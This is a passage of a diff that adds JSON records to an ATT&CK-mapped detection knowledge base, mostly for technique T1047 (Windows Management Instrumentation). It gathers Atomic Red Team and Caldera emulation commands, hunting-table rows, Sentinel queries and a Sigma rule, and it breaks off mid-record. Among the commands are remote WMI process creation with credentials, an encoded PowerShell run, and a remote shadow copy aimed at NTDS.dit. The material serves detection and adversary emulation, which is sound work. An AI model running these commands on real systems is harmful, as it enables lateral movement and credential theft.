"ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks", + "https://www.group-ib.com/blog/cobalt", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://aws.amazon.com", + "https://azure.microsoft.com/en-us/services/" + ], + null + ] + }, + { + "technique_id": "T1047", + "command_list": [ + "wmic useraccount get /ALL /format:csv\n", + "wmic process get caption,executablepath,commandline /format:csv\n", + "wmic qfe get description,installedOn /format:csv\n", + "wmic /node:\"127.0.0.1\" service where (caption like \"%#{service_search_string}%\")\n", + "wmic /node:\"#{node}\" service where (caption like \"%Spooler%\")\n", + "wmic process call create notepad.exe\n", + "wmic /user:#{user_name} /password:#{password} /node:\"127.0.0.1\" process call create #{process_to_execute}\n", + "wmic /user:DOMAIN\\Administrator /password:#{password} /node:\"#{node}\" process call create #{process_to_execute}\n", + "wmic /user:#{user_name} /password:P@ssw0rd1 /node:\"#{node}\" process call create #{process_to_execute}\n", + "wmic /user:#{user_name} /password:#{password} /node:\"#{node}\" process call create notepad.exe\n", + "powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA\n", + "$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"Win32_Process\"))\n$NewClass = $Class.Derive(\"Win32_Atomic\")\n$NewClass.Put()\nInvoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList #{process_to_execute}\n", + "$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"Win32_Process\"))\n$NewClass = $Class.Derive(\"#{new_class}\")\n$NewClass.Put()\nInvoke-WmiMethod -Path #{new_class} -Name create -ArgumentList notepad.exe\n", + "wmic /node:127.0.0.1 process call create \"rundll32.exe #{dll_to_execute} #{function_to_execute}\"\n", + "wmic /node:#{node} process call create \"rundll32.exe $env:TEMP\\calc.dll #{function_to_execute}\"\n", + "wmic /node:#{node} process call create \"rundll32.exe #{dll_to_execute} StartW\"\n", + "wmic /node:\"127.0.0.1\" product where \"name like '#{product}%%'\" call uninstall", + "wmic /node:\"#{node}\" product where \"name like 'Tightvnc%%'\" call uninstall", + "wmic process get executablepath,name,processid,parentprocessid >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n", + "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"powershell.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"cmd.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "wmic.exe /NODE:*process call create*", + "wmic.exe /NODE:*path AntiVirusProduct get*", + "wmic.exe /NODE:*path FirewallProduct get*", + "WmiPrvSE.exe", + "wmic.exe /NODE: \"192.168.0.1\" process call create \"*.exe\"", + "wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create \"at 9:00PM ^> \"", + "wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create \"cmd /c vssadmin create shadow /for=C:\\Windows\\NTDS\\NTDS.dit > c:\\not_the_NTDS.dit\"", + "powershell/lateral_movement/invoke_wmi", + "powershell/persistence/elevated/wmi" + ], + "commands": [ + { + "command": "wmic useraccount get /ALL /format:csv\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic process get caption,executablepath,commandline /format:csv\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic qfe get description,installedOn /format:csv\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:\"127.0.0.1\" service where (caption like \"%#{service_search_string}%\")\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:\"#{node}\" service where (caption like \"%Spooler%\")\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic process call create notepad.exe\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /user:#{user_name} /password:#{password} /node:\"127.0.0.1\" process call create #{process_to_execute}\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /user:DOMAIN\\Administrator /password:#{password} /node:\"#{node}\" process call create #{process_to_execute}\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /user:#{user_name} /password:P@ssw0rd1 /node:\"#{node}\" process call create #{process_to_execute}\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /user:#{user_name} /password:#{password} /node:\"#{node}\" process call create notepad.exe\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"Win32_Process\"))\n$NewClass = $Class.Derive(\"Win32_Atomic\")\n$NewClass.Put()\nInvoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList #{process_to_execute}\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"Win32_Process\"))\n$NewClass = $Class.Derive(\"#{new_class}\")\n$NewClass.Put()\nInvoke-WmiMethod -Path #{new_class} -Name create -ArgumentList notepad.exe\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:127.0.0.1 process call create \"rundll32.exe #{dll_to_execute} #{function_to_execute}\"\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:#{node} process call create \"rundll32.exe $env:TEMP\\calc.dll #{function_to_execute}\"\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:#{node} process call create \"rundll32.exe #{dll_to_execute} StartW\"\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:\"127.0.0.1\" product where \"name like '#{product}%%'\" call uninstall", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:\"#{node}\" product where \"name like 'Tightvnc%%'\" call uninstall", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic process get executablepath,name,processid,parentprocessid >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n", + "source": "data/abilities/collection/94f21386-9547-43c4-99df-938ab05d45ce.yml", + "name": "Capture process id, executable path, pid and parent pid before writing to disk" + }, + { + "command": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"powershell.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "source": "data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml", + "name": "Remotely executes 54ndc47 over WMI" + }, + { + "command": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"cmd.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "source": "data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml", + "name": "Remotely executes 54ndc47 over WMI" + }, + { + "command": "wmic.exe /NODE:*process call create*", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /NODE:*path AntiVirusProduct get*", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /NODE:*path FirewallProduct get*", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "WmiPrvSE.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "wmic.exe /NODE: \"192.168.0.1\" process call create \"*.exe\"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create \"at 9:00PM ^> \"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create \"cmd /c vssadmin create shadow /for=C:\\Windows\\NTDS\\NTDS.dit > c:\\not_the_NTDS.dit\"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/lateral_movement/invoke_wmi", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/elevated/wmi", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1047", + "display_name": "Windows Management Instrumentation", + "atomic_tests": [ + { + "name": "WMI Reconnaissance Users", + "auto_generated_guid": "c107778c-dcf5-47c5-af2e-1d058a3df3ea", + "description": "An adversary might use WMI to list all local User Accounts. \nWhen the test completes , there should be local user accounts information displayed on the command line.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic useraccount get /ALL /format:csv\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Reconnaissance Processes", + "auto_generated_guid": "5750aa16-0e59-4410-8b9a-8a47ca2788e2", + "description": "An adversary might use WMI to list Processes running on the compromised host.\nWhen the test completes , there should be running processes listed on the command line.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic process get caption,executablepath,commandline /format:csv\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Reconnaissance Software", + "auto_generated_guid": "718aebaa-d0e0-471a-8241-c5afa69c7414", + "description": "An adversary might use WMI to list installed Software hotfix and patches.\nWhen the test completes, there should be a list of installed patches and when they were installed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic qfe get description,installedOn /format:csv\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Reconnaissance List Remote Services", + "auto_generated_guid": "0fd48ef7-d890-4e93-a533-f7dedd5191d3", + "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device. \nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" \nif the provided remote host is unreacheable\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "node": { + "description": "Ip Address", + "type": "String", + "default": "127.0.0.1" + }, + "service_search_string": { + "description": "Name Of Service", + "type": "String", + "default": "Spooler" + } + }, + "executor": { + "command": "wmic /node:\"#{node}\" service where (caption like \"%#{service_search_string}%\")\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Execute Local Process", + "auto_generated_guid": "b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3", + "description": "This test uses wmic.exe to execute a process on the local host.\nWhen the test completes , a new process will be started locally .A notepad application will be started when input is left on default.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_to_execute": { + "description": "Name or path of process to execute.", + "type": "String", + "default": "notepad.exe" + } + }, + "executor": { + "command": "wmic process call create #{process_to_execute}\n", + "cleanup_command": "wmic process where name='#{process_to_execute}' delete >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Execute Remote Process", + "auto_generated_guid": "9c8ef159-c666-472f-9874-90c8d60d136b", + "description": "This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.\nTo clean up, provide the same node input as the one provided to run the test\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the default or provided IP is unreachable\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "node": { + "description": "Ip Address", + "type": "String", + "default": "127.0.0.1" + }, + "user_name": { + "description": "Username", + "type": "String", + "default": "DOMAIN\\Administrator" + }, + "password": { + "description": "Password", + "type": "String", + "default": "P@ssw0rd1" + }, + "process_to_execute": { + "description": "Name or path of process to execute.", + "type": "String", + "default": "notepad.exe" + } + }, + "executor": { + "command": "wmic /user:#{user_name} /password:#{password} /node:\"#{node}\" process call create #{process_to_execute}\n", + "cleanup_command": "wmic /user:#{user_name} /password:#{password} /node:\"#{node}\" process where name='#{process_to_execute}' delete >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Create a Process using WMI Query and an Encoded Command", + "auto_generated_guid": "7db7a7f9-9531-4840-9b30-46220135441c", + "description": "Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand\n Powershell -nop -exec bypass -EncodedCommand \nWhere the \u2013EncodedCommand, once decoded, would resemble:\n Invoke-WMIMethod win32_process -name create -argumentlist \u2018rundll32 c:\\windows\\idmu\\common\\ypprop.dll _XInitImageFuncPtrs\u2019 -ComputerName WORKSTATION\nThe EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe\nYou should expect to see notepad.exe running after execution of this test.\n[Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA\n", + "name": "command_prompt" + } + }, + { + "name": "Create a Process using obfuscated Win32_Process", + "auto_generated_guid": "10447c83-fc38-462a-a936-5102363b1c43", + "description": "This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.\n[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "new_class": { + "description": "Derived class name", + "type": "String", + "default": "Win32_Atomic" + }, + "process_to_execute": { + "description": "Name or path of process to execute.", + "type": "String", + "default": "notepad.exe" + } + }, + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"Win32_Process\"))\n$NewClass = $Class.Derive(\"#{new_class}\")\n$NewClass.Put()\nInvoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}\n", + "cleanup_command": "$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"#{new_class}\"))\ntry { $CleanupClass.Delete() } catch {}\n" + } + }, + { + "name": "WMI Execute rundll32", + "auto_generated_guid": "00738d2a-4651-4d76-adf2-c43a41dfb243", + "description": "This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "node": { + "description": "Ip Address", + "type": "String", + "default": "127.0.0.1" + }, + "dll_to_execute": { + "description": "Path to DLL.", + "type": "String", + "default": "$env:TEMP\\calc.dll" + }, + "function_to_execute": { + "description": "Name of DLL function to call", + "type": "String", + "default": "StartW" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DLL with function to execute must exist on disk at specified location (#{dll_to_execute})", + "prereq_command": "if (Test-Path #{dll_to_execute}) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true\" -OutFile \"#{dll_to_execute}\"\n" + } + ], + "executor": { + "command": "wmic /node:#{node} process call create \"rundll32.exe #{dll_to_execute} #{function_to_execute}\"\n", + "cleanup_command": "taskkill /f /im calculator.exe", + "name": "powershell" + } + }, + { + "name": "Application uninstall using WMIC", + "auto_generated_guid": "c510d25b-1667-467d-8331-a56d3e9bc4ff", + "description": "Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "node": { + "description": "Computer the action is being executed against but defaults to the localhost.", + "type": "string", + "default": "127.0.0.1" + }, + "product": { + "description": "Enter the product name being uninstalled. This will default to TightVNC.", + "type": "String", + "default": "Tightvnc" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "TightVNC must be installed.", + "prereq_command": "if ((Test-Path \"C:\\Program Files\\TightVNC\\tvnviewer.exe\")-Or (Test-Path \"C:\\Program Files (x86)\\TightVNC\\tvnviewer.exe\")) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile PathToAtomicsFolder\\T1047\\bin\\tightvncinstaller.msi\nstart-sleep -s 10\nmsiexec /i PathToAtomicsFolder\\T1047\\bin\\tightvncinstaller.msi /qn /norestart\nstart-sleep -s 15" + } + ], + "executor": { + "command": "wmic /node:\"#{node}\" product where \"name like '#{product}%%'\" call uninstall", + "cleanup_command": "msiexec /i PathToAtomicsFolder\\T1047\\bin\\tightvncinstaller.msi /qn /norestart", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "id": "94f21386-9547-43c4-99df-938ab05d45ce", + "name": "WMIC Process Enumeration", + "description": "Capture process id, executable path, pid and parent pid before writing to disk", + "tactic": "collection", + "technique": { + "attack_id": "T1047", + "name": "WMIC" + }, + "platforms": { + "windows": { + "psh": { + "command": "wmic process get executablepath,name,processid,parentprocessid >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n" + } + } + } + }, + { + "id": "ece5dde3-d370-4c20-b213-a1f424aa8d03", + "name": "Start 54ndc47 (WMI)", + "description": "Remotely executes 54ndc47 over WMI", + "tactic": "execution", + "technique": { + "attack_id": "T1047", + "name": "Windows Management Instrumentation" + }, + "platforms": { + "windows": { + "psh": { + "command": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"powershell.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "cleanup": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"taskkill /f /im s4ndc4t.exe\"\n" + }, + "cmd": { + "command": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"cmd.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "cleanup": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"taskkill /f /im s4ndc4t.exe\"\n" + } + } + }, + "singleton": true, + "requirements": [ + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "domain.user.name", + "edge": "has_password", + "target": "domain.user.password" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "remote.host.fqdn", + "edge": "has_54ndc47_copy" + } + ] + }, + { + "plugins.stockpile.app.requirements.req_like": [ + { + "source": "remote.host.fqdn", + "edge": "has_admin", + "target": "domain.user.name" + } + ] + }, + { + "plugins.stockpile.app.requirements.no_backwards_movement": [ + { + "source": "remote.host.fqdn" + } + ] + }, + { + "plugins.stockpile.app.requirements.reachable": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + } + ] + }, + { + "chain_id": "100098", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/NODE:*process call create*", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "wmi", + "mitre_attack": "T1047", + "itw_sample": "f86c9d4c4b0afad1bb812fff0191b50c731760494ed45986e93b858daf386226" + }, + { + "chain_id": "100099", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/NODE:*path AntiVirusProduct get*", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "wmi", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "chain_id": "100100", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/NODE:*path FirewallProduct get*", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "wmi", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "chain_id": "100102", + "os": "windows", + "parent_process": "WmiPrvSE.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "wmi", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "chain_id": "100171", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/NODE: \"192.168.0.1\" process call create \"*.exe\"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "execution", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "chain_id": "100172", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/node:REMOTECOMPUTERNAME PROCESS call create \"at 9:00PM ^> \"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "execution", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "chain_id": "100173", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/node:REMOTECOMPUTERNAME PROCESS call create \"cmd /c vssadmin create shadow /for=C:\\Windows\\NTDS\\NTDS.dit > c:\\not_the_NTDS.dit\"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "execution", + "mitre_attack": "T1047", + "itw_sample": "" + }, + { + "Empire Module": "powershell/lateral_movement/invoke_wmi", + "ATT&CK Technique #1": "T1047", + "ATT&CK Technique #2": "", + "Technique": "Windows Management Instrumentation", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_wmi\": [\"T1047\"]," + }, + { + "Empire Module": "powershell/persistence/elevated/wmi", + "ATT&CK Technique #1": "T1047", + "ATT&CK Technique #2": "", + "Technique": "Windows Management Instrumentation", + "Concatenate for Python Dictionary": "\"powershell/persistence/elevated/wmi\": [\"T1047\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 20 and wmi_consumer_type contains \"Command Line\"", + "name": "WMI Command Execution" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 11 and process_command_line contains \"C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe\"", + "name": "Windows Management Instrumentation Active Script Event Consumer FileAccess" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_parent_command_line contains \"C:\\\\Windows\\\\System32\\\\svchost.exe\"or process_command_line contains \"C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe\")", + "name": "Windows Management Instrumentation Active Script Event Consumer Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and (process_path contains \"wmic.exe\"or process_command_line contains \"wmic\")", + "name": "Windows Management Instrumentation Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_parent_command_line contains \"wmiprvse.exe\"or process_path contains \"wmic.exe\"or process_command_line contains \"wmic\")", + "name": "Windows Management Instrumentation Process" + } + ], + "possible_detections": [ + { + "title": "SquiblyTwo", + "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "status": "experimental", + "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash", + "references": [ + "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", + "https://twitter.com/mattifestation/status/986280382042595328" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1047" + ], + "author": "Markus Neis / Florian Roth", + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Image": [ + "*\\wmic.exe" + ], + "CommandLine": [ + "wmic * *format:\\\"http*", + "wmic * /format:'http", + "wmic * /format:http*" + ] + }, + "selection2": { + "Imphash": [ 